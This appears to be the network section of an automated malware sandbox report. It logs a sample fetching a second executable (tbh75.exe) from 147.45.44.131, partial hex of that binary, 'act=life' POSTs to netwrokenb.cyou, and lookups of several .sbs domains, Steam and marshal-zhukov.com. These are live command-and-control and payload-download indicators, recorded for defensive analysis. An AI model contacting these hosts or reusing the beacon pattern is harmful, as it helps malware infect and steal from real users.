Nov 14, 2024 08:08:30.607126951 CET	49711	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:30.801289082 CET	49712	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:30.801347971 CET	443	49712	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:30.801418066 CET	49712	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:30.801903963 CET	49712	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:30.801918030 CET	443	49712	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:31.420839071 CET	443	49712	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:31.420994043 CET	49712	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:31.461370945 CET	49712	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:31.461393118 CET	443	49712	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:31.461853981 CET	443	49712	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:31.483254910 CET	49712	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:31.483371973 CET	49712	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:31.483378887 CET	443	49712	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:31.976754904 CET	443	49712	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:31.976892948 CET	443	49712	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:31.976991892 CET	49712	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:31.977123976 CET	49712	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:31.977140903 CET	443	49712	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:32.353662968 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:32.353709936 CET	443	49713	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:32.353780985 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:32.354091883 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:32.354108095 CET	443	49713	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:32.961669922 CET	443	49713	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:32.961765051 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:32.963088036 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:32.963099003 CET	443	49713	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:32.963448048 CET	443	49713	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:32.964566946 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:32.965342045 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:32.965379953 CET	443	49713	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:32.965465069 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:32.965512991 CET	443	49713	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:32.965631962 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:32.965702057 CET	443	49713	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:32.965806007 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:32.965842009 CET	443	49713	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:32.965961933 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:32.965996981 CET	443	49713	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:32.966114044 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:32.966145039 CET	443	49713	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:32.966156006 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:32.966173887 CET	443	49713	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:32.966269016 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:32.966294050 CET	443	49713	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:32.966312885 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:32.966413975 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:32.966461897 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:32.975641012 CET	443	49713	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:32.975789070 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:32.975826979 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:32.975856066 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:32.975991011 CET	443	49713	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:32.976089954 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:32.976171970 CET	443	49713	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:35.391227961 CET	443	49713	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:35.391371965 CET	443	49713	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:35.391428947 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:35.391495943 CET	49713	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:35.391515017 CET	443	49713	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:35.397764921 CET	49715	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:35.397798061 CET	443	49715	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:35.397865057 CET	49715	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:35.398262978 CET	49715	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:35.398273945 CET	443	49715	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:36.007986069 CET	443	49715	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:36.008105993 CET	49715	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:36.009249926 CET	49715	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:36.009268045 CET	443	49715	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:36.010062933 CET	443	49715	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:36.011115074 CET	49715	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:36.011163950 CET	49715	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:36.011215925 CET	443	49715	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:36.490824938 CET	443	49715	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:36.490932941 CET	443	49715	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:36.491095066 CET	49715	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:36.491151094 CET	49715	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:36.491151094 CET	49715	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:36.491174936 CET	443	49715	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:36.491187096 CET	443	49715	188.114.96.3	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 14, 2024 08:08:20.850723982 CET	63925	53	192.168.2.5	1.1.1.1
Nov 14, 2024 08:08:20.898324013 CET	53	63925	1.1.1.1	192.168.2.5
Nov 14, 2024 08:08:22.079251051 CET	51047	53	192.168.2.5	1.1.1.1
Nov 14, 2024 08:08:22.101927996 CET	53	51047	1.1.1.1	192.168.2.5
Nov 14, 2024 08:08:22.103876114 CET	62596	53	192.168.2.5	1.1.1.1
Nov 14, 2024 08:08:22.126727104 CET	53	62596	1.1.1.1	192.168.2.5
Nov 14, 2024 08:08:22.150149107 CET	53035	53	192.168.2.5	1.1.1.1
Nov 14, 2024 08:08:22.172333002 CET	53	53035	1.1.1.1	192.168.2.5
Nov 14, 2024 08:08:22.173799038 CET	55432	53	192.168.2.5	1.1.1.1
Nov 14, 2024 08:08:22.195878983 CET	53	55432	1.1.1.1	192.168.2.5
Nov 14, 2024 08:08:22.197366953 CET	49300	53	192.168.2.5	1.1.1.1
Nov 14, 2024 08:08:22.220109940 CET	53	49300	1.1.1.1	192.168.2.5
Nov 14, 2024 08:08:22.224280119 CET	55898	53	192.168.2.5	1.1.1.1
Nov 14, 2024 08:08:22.246279955 CET	53	55898	1.1.1.1	192.168.2.5
Nov 14, 2024 08:08:22.258707047 CET	52893	53	192.168.2.5	1.1.1.1
Nov 14, 2024 08:08:22.281380892 CET	53	52893	1.1.1.1	192.168.2.5
Nov 14, 2024 08:08:22.309757948 CET	51358	53	192.168.2.5	1.1.1.1
Nov 14, 2024 08:08:22.331646919 CET	53	51358	1.1.1.1	192.168.2.5
Nov 14, 2024 08:08:22.365540028 CET	64913	53	192.168.2.5	1.1.1.1
Nov 14, 2024 08:08:22.372437954 CET	53	64913	1.1.1.1	192.168.2.5
Nov 14, 2024 08:08:23.976547003 CET	49466	53	192.168.2.5	1.1.1.1
Nov 14, 2024 08:08:24.142843962 CET	53	49466	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 14, 2024 08:08:20.850723982 CET	192.168.2.5	1.1.1.1	0xa021	Standard query (0)	netwrokenb.cyou	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:22.079251051 CET	192.168.2.5	1.1.1.1	0x1fdf	Standard query (0)	repostebhu.sbs	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:22.103876114 CET	192.168.2.5	1.1.1.1	0x1d59	Standard query (0)	thinkyyokej.sbs	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:22.150149107 CET	192.168.2.5	1.1.1.1	0x5d99	Standard query (0)	ducksringjk.sbs	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:22.173799038 CET	192.168.2.5	1.1.1.1	0x9d55	Standard query (0)	explainvees.sbs	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:22.197366953 CET	192.168.2.5	1.1.1.1	0x5c47	Standard query (0)	brownieyuz.sbs	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:22.224280119 CET	192.168.2.5	1.1.1.1	0xee44	Standard query (0)	rottieud.sbs	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:22.258707047 CET	192.168.2.5	1.1.1.1	0x7285	Standard query (0)	relalingj.sbs	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:22.309757948 CET	192.168.2.5	1.1.1.1	0xc038	Standard query (0)	tamedgeesy.sbs	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:22.365540028 CET	192.168.2.5	1.1.1.1	0x4369	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:23.976547003 CET	192.168.2.5	1.1.1.1	0x2f90	Standard query (0)	marshal-zhukov.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 14, 2024 08:08:20.898324013 CET	1.1.1.1	192.168.2.5	0xa021	No error (0)	netwrokenb.cyou		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:20.898324013 CET	1.1.1.1	192.168.2.5	0xa021	No error (0)	netwrokenb.cyou		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:22.101927996 CET	1.1.1.1	192.168.2.5	0x1fdf	Name error (3)	repostebhu.sbs	none	none	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:22.126727104 CET	1.1.1.1	192.168.2.5	0x1d59	Name error (3)	thinkyyokej.sbs	none	none	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:22.172333002 CET	1.1.1.1	192.168.2.5	0x5d99	Name error (3)	ducksringjk.sbs	none	none	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:22.195878983 CET	1.1.1.1	192.168.2.5	0x9d55	Name error (3)	explainvees.sbs	none	none	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:22.220109940 CET	1.1.1.1	192.168.2.5	0x5c47	Name error (3)	brownieyuz.sbs	none	none	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:22.246279955 CET	1.1.1.1	192.168.2.5	0xee44	Name error (3)	rottieud.sbs	none	none	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:22.281380892 CET	1.1.1.1	192.168.2.5	0x7285	Name error (3)	relalingj.sbs	none	none	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:22.331646919 CET	1.1.1.1	192.168.2.5	0xc038	Name error (3)	tamedgeesy.sbs	none	none	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:22.372437954 CET	1.1.1.1	192.168.2.5	0x4369	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:24.142843962 CET	1.1.1.1	192.168.2.5	0x2f90	No error (0)	marshal-zhukov.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 14, 2024 08:08:24.142843962 CET	1.1.1.1	192.168.2.5	0x2f90	No error (0)	marshal-zhukov.com		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

netwrokenb.cyou

steamcommunity.com

marshal-zhukov.com

147.45.44.131

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	147.45.44.131	80	5700	C:\Users\user\Desktop\nlJ2sNaZVi.exe

Timestamp	Bytes transferred	Direction	Data
Nov 14, 2024 08:08:17.691899061 CET	181	OUT	GET /infopage/tbh75.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq Host: 147.45.44.131 Connection: Keep-Alive
Nov 14, 2024 08:08:18.529835939 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 07:08:18 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Sat, 09 Nov 2024 19:43:55 GMT ETag: "48400-62680167b1aa2" Accept-Ranges: bytes Content-Length: 295936 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 49 a2 2e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 c0 03 00 00 c0 00 00 00 00 00 00 f0 8a 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ea eb 03 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 38 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 ed [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELI.g@`@ 8?0.text `.rdata "@@.dataH\@.CRTB@@.reloc8? @D@B
Nov 14, 2024 08:08:18.529863119 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: D$t(8uxuxuD$D$jP1USWV \|$81t$4.]SWut%E.]S4uEu
Nov 14, 2024 08:08:18.529874086 CET	1236	IN	Data Raw: c4 04 85 c0 0f 84 71 02 00 00 b9 01 00 00 00 89 c3 c7 00 00 00 00 00 c7 40 04 06 00 00 00 89 48 08 e9 55 02 00 00 c7 45 08 00 00 00 00 55 e9 01 01 00 00 89 c7 8b 5c 24 14 50 e8 4d 70 00 00 83 c4 04 39 c3 0f 85 7a 02 00 00 8b 1e 0f b6 2b 55 e8 f7 Data Ascii: q@HUEU\$PMp9z+UptC+UpCuK<:ECt$V@-PWt$6.]SptE.]S}pEuM,)E.]S
Nov 14, 2024 08:08:18.529891014 CET	1236	IN	Data Raw: cc cc cc cc cc cc cc cc 8b 4c 24 04 31 c0 85 c9 74 09 83 79 04 04 75 03 8b 41 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc 53 57 56 8b 7c 24 10 31 f6 85 ff 74 29 8b 5c 24 14 85 db 74 21 53 e8 75 6b 00 00 83 c4 04 50 53 57 e8 0a fe ff ff 83 c4 0c 85 Data Ascii: L$1tyuASWV\|$1t)\$t!SukPSWtxup^_[L$1tyuASWV\|$t)\$t!SkPSWtxup^_[SWV\$\|$j.S]ktDCj.SEk
Nov 14, 2024 08:08:18.529896975 CET	848	IN	Data Raw: 89 34 90 8b 41 04 8b 51 18 89 14 a8 8b 41 10 8b 74 24 2c 89 34 90 8b 41 14 8b 51 18 89 2c 90 8b 41 08 8b 51 18 89 1c 90 ff 41 18 8b 01 89 06 31 c0 eb 14 e8 cc 00 00 00 89 c1 b8 ff ff ff ff 85 c9 8b 4c 24 28 74 08 83 c4 10 5e 5f 5b 5d c3 51 e8 8f Data Ascii: 4AQAt$,4AQ,AQA1L$(t^_[]Qf$L$$y )!GD$AD$FOtZ#l$D$HQ9uID$PfL$(;$u4$t$t$02fL$0u
Nov 14, 2024 08:08:18.529912949 CET	1236	IN	Data Raw: 24 2c 00 00 00 00 ff 74 24 10 ff 15 00 00 44 00 83 c4 04 ff 74 24 18 ff 15 00 00 44 00 83 c4 04 ff 74 24 1c ff 15 00 00 44 00 83 c4 04 ff 74 24 20 ff 15 00 00 44 00 83 c4 04 ff 74 24 14 e9 fa fe ff ff cc 55 53 57 56 83 ec 14 8b 29 31 c0 80 7d 00 Data Ascii: $,t$Dt$Dt$Dt$ Dt$USWV)1}"s1{F1{\to"uT$)CPD$74$G4$E4$l$<\u,ES
Nov 14, 2024 08:08:18.530200958 CET	1236	IN	Data Raw: 10 85 f6 0f 84 56 01 00 00 ba af a9 6e 5e 89 f0 f7 e2 c1 ea 0b 69 c2 b0 15 00 00 89 f2 29 c2 89 d0 eb 52 90 90 90 90 90 90 90 90 90 90 90 90 90 8b 04 24 2b 44 24 0c 01 c5 8b 74 24 04 89 f8 ba 71 80 07 80 f7 e2 89 d3 c1 eb 0f 89 c8 ba 71 80 07 80 Data Ascii: Vn^i)R$+D$t$qqi)i)+4$1$t$rk1TtTtTtT\|P;$$rt$)
Nov 14, 2024 08:08:18.530220985 CET	1236	IN	Data Raw: 00 00 00 29 c7 8b 4e 58 8b 56 5c 39 d7 72 02 89 d7 03 46 74 01 f1 81 c1 72 92 03 00 57 51 50 e8 c8 57 00 00 83 c4 0c 01 7e 58 29 7e 5c 03 be 8c 00 00 00 89 be 8c 00 00 00 8b 46 7c 89 38 83 7e 60 00 74 0b 31 c0 83 7e 5c 00 0f 94 c0 eb 02 31 c0 5e Data Ascii: )NXV\9rFtrWQPW~X)~\F\|8~`t1~\1^_USWV@l$TD$0D$D$(rD$4jD$<2D$jUT$\|$T$tu M$1w3F
Nov 14, 2024 08:08:18.530236959 CET	1236	IN	Data Raw: 89 fb 89 7c 24 14 b9 01 00 00 00 29 f1 89 4c 24 2c eb 1b 90 90 90 90 90 8b 4c 24 2c 41 89 4c 24 2c 83 f9 01 8b 7c 24 14 0f 84 6a 01 00 00 8b 4c 24 54 0f b7 9c 59 72 92 01 00 85 db 0f 84 56 01 00 00 8b 4c 24 18 29 d9 0f b7 f9 39 fd 0f 82 3b 01 00 Data Ascii: \|$)L$,L$,AL$,\|$jL$TYrVL$)9;t$TT$ 8uT$81^rL$)9T$ 8uT$81tR^rL$)94T$
Nov 14, 2024 08:08:18.530478001 CET	248	IN	Data Raw: 02 00 00 0f 83 df fe ff ff 81 e7 ff 01 00 00 8d 8f 6a d9 43 00 8b 54 24 04 0f b6 09 66 ff 84 4d d2 83 00 00 0f b7 8c 00 e4 db 43 00 66 ff 84 4d 92 81 00 00 e9 2d ff ff ff c7 45 38 08 00 00 00 8b 55 28 8d 72 01 89 75 28 89 55 2c 81 ff 00 02 00 00 Data Ascii: jCT$fMCfM-E8U(ru(U,jCT$fMCfMEPD$D$TL$@^_[]USWVPt$Fu1>u,F+F@;F$>uF\|
Nov 14, 2024 08:08:18.535059929 CET	1236	IN	Data Raw: 29 c8 3d cc 4c 01 00 72 05 03 4e 74 eb 06 8d 8e 72 92 03 00 89 4e 30 89 0c 24 8d 81 bc 4c 01 00 89 46 34 c7 46 58 00 00 00 00 c7 46 5c 00 00 00 00 8b 46 2c 0f b6 18 0f b6 4e 38 d3 eb 8b 6c 24 1c 88 18 8b 4e 08 31 c0 83 7e 38 08 0f 94 c0 29 46 28 Data Ascii: )=LrNtrN0$LF4FXF\F,N8l$N1~8)F(t~d1^DFHFHC^Dn01u*Fu~<0.N<tV0)B9rN+N@;N$vY7n0~H^D.HN0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	188.114.96.3	443	6484	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 07:08:21 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: netwrokenb.cyou
2024-11-14 07:08:21 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-14 07:08:22 UTC	1011	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 07:08:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=psbkn4id5vv4npa1b0dk5bklgn; expires=Mon, 10 Mar 2025 00:55:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fZQHWYO%2FwqtRyKMY%2Fo0bIUzC769QSKOiK5oawmZkGBcor2xGQNKDzAhaY3GwyNYbLYdec8Qc2gNQLmeNG19%2FpUuuSk%2F6wecqb3cYzudAo3CqsrFnMPwIFeJ7GQC6F8Qxujo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e252b7b6cbe0baf-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1360&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=2087959&cwnd=245&unsent_bytes=0&cid=2566d13972d4aa21&ts=560&x=0"
2024-11-14 07:08:22 UTC	9	IN	Data Raw: 34 0d 0a 66 61 69 6c 0d 0a Data Ascii: 4fail
2024-11-14 07:08:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	104.102.49.254	443	6484	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 07:08:23 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-11-14 07:08:23 UTC	1917	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 14 Nov 2024 07:08:23 GMT Content-Length: 35964 Connection: close Set-Cookie: sessionid=543a790b33e49755b481c0a6; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C129b19db70bc2b7ff2901c827e2c9472; Path=/; Secure; HttpOnly; SameSite=None
2024-11-14 07:08:23 UTC	14467	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-11-14 07:08:23 UTC	16384	IN	Data Raw: 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0d 0a 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0d 0a 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e Data Ascii: <a class="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="submen
